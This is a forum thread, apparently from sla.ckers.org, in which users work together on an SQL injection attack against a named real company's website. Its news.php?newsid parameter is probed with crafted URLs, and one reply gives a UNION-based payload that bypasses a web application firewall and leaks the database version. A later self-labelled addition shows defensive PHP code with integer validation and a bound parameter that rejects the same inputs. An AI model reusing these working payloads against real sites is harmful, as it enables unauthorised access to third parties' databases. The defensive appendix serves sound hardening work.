Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
how to inject this bug?
Posted by: annen
Date: April 18, 2012 05:57AM

http://www.clearviewgroup.ca/news.php?newsid=16


http://www.clearviewgroup.ca/news.php?newsid=16-- works well
http://www.clearviewgroup.ca/news.php?newsid=-16-- error in

http://www.clearviewgroup.ca/news.php?newsid=16 order by 1--
"
INVALID SQL: 1054 : Unknown column '20order' in 'where clause'
SQL QUERY FAILURE: SELECT title, postdate, content FROM ht_news WHERE id = 16%20order%20by%201--
"
How to bypass it?

Re: how to inject this bug?
Posted by: Razor4x
Date: April 18, 2012 12:17PM

http://www.clearviewgroup.ca/news.php?newsid=(-16)UNION(SELECT+version(),2,3)--

5.5.14

thanks to m4rkz...

Re: how to inject this bug?
Posted by: Nerder
Date: April 18, 2012 05:45PM

Siiick... this WAF was very hard! I tried to bypass it for one day!!!

Re: how to inject this bug?
Posted by: annen
Date: April 18, 2012 09:21PM

Sorry! I can't get table_names......
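
For the defensive side of this thread, an added example (not part of the original posts or the site's code): the query shown in the error message, rebuilt with strict integer validation, a bound parameter, and no SQL error echoed to the client. The schema, the sample row, the fetch_news() name and the SQLite in-memory stand-in for MySQL are assumptions.

```php
<?php
// Added example. Table and column names come from the error message in the
// thread; the schema, sample row and fetch_news() are assumptions, and
// SQLite in-memory stands in for the MySQL server so this runs offline.

function fetch_news(PDO $db, $rawId): ?array
{
    // Accept only a plain positive decimal integer. Values such as
    // "16 order by 1--" or "(-16)UNION(...)" fail here and never reach SQL.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    try {
        // The id is bound as an integer, never concatenated into the statement.
        $stmt = $db->prepare('SELECT title, postdate, content FROM ht_news WHERE id = :id');
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    } catch (PDOException $e) {
        // Log server-side only; the client never sees the SQL text or driver error.
        error_log('news lookup failed: ' . $e->getMessage());
        return null;
    }
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ht_news (id INTEGER PRIMARY KEY, title TEXT, postdate TEXT, content TEXT)');
$db->exec("INSERT INTO ht_news VALUES (16, 'Constructed title', '2012-04-18', 'Constructed body')");

// Constructed inputs mirroring the newsid values posted in the thread.
$inputs = [
    '16',
    '16--',
    '-16--',
    '16 order by 1--',
    '16%20order%20by%201--',
    '(-16)UNION(SELECT version(),2,3)--',
];
foreach ($inputs as $in) {
    $row = fetch_news($db, $in);
    printf("%-38s => %s\n", $in, $row ? $row['title'] : 'rejected (generic 404)');
}
```

Only the first input returns a row; every other value is rejected before a statement is prepared, so a WAF is no longer the only control in front of the query.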
